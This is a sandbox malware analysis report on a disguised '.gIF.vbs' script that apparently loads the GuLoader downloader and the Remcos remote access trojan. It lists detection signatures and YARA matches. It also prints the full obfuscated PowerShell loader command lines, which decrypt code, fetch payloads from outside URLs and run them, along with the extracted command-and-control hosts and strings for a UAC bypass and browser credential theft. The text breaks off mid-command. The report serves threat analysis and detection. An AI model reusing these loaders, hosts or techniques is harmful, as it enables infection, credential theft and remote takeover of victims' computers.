
Windows Analysis Report
createdthingstobefrankwithmeeverywhere.gIF.vbs

Overview

General Information

Sample name: createdthingstobefrankwithmeeverywhere.gIF.vbs
Analysis ID: 1483434
MD5: 4d03b030f4db434da80e0ec3fa7e4398
SHA1: 0b4eed00595be5235f5a51cebeda6fa31402b94b
SHA256: 90afe2e4506b34bd63e597279707d13c6d8512fd52e0b670c9e45890211c76b6
Tags: vbs

Detection

GuLoader, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected AntiVM3
Yara detected GuLoader
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Maps a DLL or memory area into another process
Obfuscated command line found
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Cscript/Wscript Uncommon Script Extension Execution
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch or control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 3500 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createdthingstobefrankwithmeeverywhere.gIF.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 4432 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RegAsm.exe (PID: 5684 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • wscript.exe (PID: 7060 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
          • powershell.exe (PID: 7244 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). 
');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPSr,oSg r a mGrmeGdJa kSt rSs )D ') ;Scance (Svndyssendes94 '.$Lg.l o,bha lD:VfRoSrVl i sAe.= $,g lBoSbAa,lV:FSAmOaGa t r.yEk,kse n eP+E+ %a$gSHu.jieHt .ScKoHu n,tH ') ;$Udvandringerne=$Sujet[$forlise];}$Hjsangs=362888;$Destalinising=27100;Scance (Svndyssendes94 'A$.g l oHb a l :SW h i f.fSe rP B=F G e t -DCFo n t,eFnNtW S$ PrrAo gSrHaSm rPe d aTkIt.rPsT ');Scance (Svndyssendes94 'N$og,l.oFbDaTlT:SFPoCr.l iNs E=H F[ S yRs.tce mS.CCPoAn.v eRr,tT] :,:,F r.o m B,aOs,e 6B4 SPtErFi.nOgD(F$ WVh icf fFehr,)L ');Scance (Svndyssendes94 'T$Bg lOo,bVa l :oHAeTbKeCn oGn =R F[.SBy.sPt e m..TT.e.x.t..VESn c.oGd,i n gD],:.:GA S CNIGI,. 
G eCt,SAt r.i n gG( $ FPo,r lliIsF) ');Scance (Svndyssendes94 'K$,gYlSoDb,a.lB:ODLe sNq uTa mFa tDiCoAn s = $ H.eLbYeHn oSnB.MsruFbMsPt rLiAnBg.( $.Hlj,s aAnSg sA,T$FD eTs tAaGlUi n ips i nugC)R ');Scance $Desquamations;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 7252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 7356 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • powershell.exe (PID: 7632 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). 
');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPSr,oSg r a mGrmeGdJa kSt rSs )D ') ;Scance (Svndyssendes94 '.$Lg.l o,bha lD:VfRoSrVl i sAe.= $,g lBoSbAa,lV:FSAmOaGa t r.yEk,kse n eP+E+ %a$gSHu.jieHt .ScKoHu n,tH ') ;$Udvandringerne=$Sujet[$forlise];}$Hjsangs=362888;$Destalinising=27100;Scance (Svndyssendes94 'A$.g l oHb a l :SW h i f.fSe rP B=F G e t -DCFo n t,eFnNtW S$ PrrAo gSrHaSm rPe d aTkIt.rPsT ');Scance (Svndyssendes94 'N$og,l.oFbDaTlT:SFPoCr.l iNs E=H F[ S yRs.tce mS.CCPoAn.v eRr,tT] :,:,F r.o m B,aOs,e 6B4 SPtErFi.nOgD(F$ WVh icf fFehr,)L ');Scance (Svndyssendes94 'T$Bg lOo,bVa l :oHAeTbKeCn oGn =R F[.SBy.sPt e m..TT.e.x.t..VESn c.oGd,i n gD],:.:GA S CNIGI,. 
G eCt,SAt r.i n gG( $ FPo,r lliIsF) ');Scance (Svndyssendes94 'K$,gYlSoDb,a.lB:ODLe sNq uTa mFa tDiCoAn s = $ H.eLbYeHn oSnB.MsruFbMsPt rLiAnBg.( $.Hlj,s aAnSg sA,T$FD eTs tAaGlUi n ips i nugC)R ');Scance $Desquamations;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • cmd.exe (PID: 7716 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • RegAsm.exe (PID: 5792 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrfptuyewdgikkwbbqnxbflydidjpkpem" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • RegAsm.exe (PID: 3620 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrfptuyewdgikkwbbqnxbflydidjpkpem" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • RegAsm.exe (PID: 3920 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jmlaun" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • RegAsm.exe (PID: 6056 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\tgqsvxbzg" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "iwarsut775laudrye2.duckdns.org:57484:0iwarsut775laudrye2.duckdns.org:57483:1iwarsut775laudrye3.duckdns.org:57484:0hjnourt38haoust1.duckdns.org:57484:0", "Assigned name": "MAGIC", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "shietgtst-A57Q98", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "sfvnspt.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\sfvnspt.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

Source | Rule | Description | Author | Strings
00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
        • 0x6c4a8:$a1: Remcos restarted by watchdog!
        • 0x6ca20:$a3: %02i:%02i:%02i:%03i
00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp | REMCOS_RAT_variants | unknown | unknown
        • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
        • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x6656c:$str_b2: Executing file:
        • 0x675ec:$str_b3: GetDirectListeningPort
        • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x67118:$str_b7: \update.vbs
        • 0x66594:$str_b9: Downloaded file:
        • 0x66580:$str_b10: Downloading file:
        • 0x66624:$str_b12: Failed to upload file:
        • 0x675b4:$str_b13: StartForward
        • 0x675d4:$str_b14: StopForward
        • 0x67070:$str_b15: fso.DeleteFile "
        • 0x67004:$str_b16: On Error Resume Next
        • 0x670a0:$str_b17: fso.DeleteFolder "
        • 0x66614:$str_b18: Uploaded file:
        • 0x665d4:$str_b19: Unable to delete:
        • 0x67038:$str_b20: while fso.FileExists("
        • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen
        • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
        • 0x6637c:$s1: CoGetObject
        • 0x66390:$s1: CoGetObject
        • 0x663ac:$s1: CoGetObject
        • 0x70338:$s1: CoGetObject
        • 0x6633c:$s2: Elevation:Administrator!new:
Source | Rule | Description | Author | Strings
4.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
4.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
4.2.RegAsm.exe.400000.0.raw.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
            • 0x6c4a8:$a1: Remcos restarted by watchdog!
            • 0x6ca20:$a3: %02i:%02i:%02i:%03i
4.2.RegAsm.exe.400000.0.raw.unpack | REMCOS_RAT_variants | unknown | unknown
            • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
            • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
            • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
            • 0x6656c:$str_b2: Executing file:
            • 0x675ec:$str_b3: GetDirectListeningPort
            • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
            • 0x67118:$str_b7: \update.vbs
            • 0x66594:$str_b9: Downloaded file:
            • 0x66580:$str_b10: Downloading file:
            • 0x66624:$str_b12: Failed to upload file:
            • 0x675b4:$str_b13: StartForward
            • 0x675d4:$str_b14: StopForward
            • 0x67070:$str_b15: fso.DeleteFile "
            • 0x67004:$str_b16: On Error Resume Next
            • 0x670a0:$str_b17: fso.DeleteFolder "
            • 0x66614:$str_b18: Uploaded file:
            • 0x665d4:$str_b19: Unable to delete:
            • 0x67038:$str_b20: while fso.FileExists("
            • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
4.2.RegAsm.exe.400000.0.raw.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen
            • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
            • 0x6637c:$s1: CoGetObject
            • 0x66390:$s1: CoGetObject
            • 0x663ac:$s1: CoGetObject
            • 0x70338:$s1: CoGetObject
            • 0x6633c:$s2: Elevation:Administrator!new:
Source | Rule | Description | Author | Strings
amsi64_4432.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi64_4432.amsi.csv | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security
amsi32_7244.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi32_7244.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
                  • 0xf515:$b2: ::FromBase64String(
                  • 0xc8e3:$s1: -join
                  • 0x608f:$s4: +=
                  • 0x6151:$s4: +=
                  • 0xa378:$s4: +=
                  • 0xc495:$s4: +=
                  • 0xc77f:$s4: +=
                  • 0xc8c5:$s4: +=
                  • 0xec5a:$s4: +=
                  • 0xecda:$s4: +=
                  • 0xeda0:$s4: +=
                  • 0xee20:$s4: +=
                  • 0xeff6:$s4: +=
                  • 0xf07a:$s4: +=
                  • 0xd0e5:$e4: Get-WmiObject
                  • 0xd2d4:$e4: Get-Process
                  • 0xd32c:$e4: Start-Process
amsi32_7632.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
                  • 0xa0d5:$b2: ::FromBase64String(
                  • 0x917b:$s1: -join
                  • 0x2927:$s4: +=
                  • 0x29e9:$s4: +=
                  • 0x6c10:$s4: +=
                  • 0x8d2d:$s4: +=
                  • 0x9017:$s4: +=
                  • 0x915d:$s4: +=
                  • 0x1246a:$s4: +=
                  • 0x124ea:$s4: +=
                  • 0x125b0:$s4: +=
                  • 0x12630:$s4: +=
                  • 0x12806:$s4: +=
                  • 0x1288a:$s4: +=
                  • 0x997d:$e4: Get-WmiObject
                  • 0x9b6c:$e4: Get-Process
                  • 0x9bc4:$e4: Start-Process
                  • 0x13113:$e4: Get-Process

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= 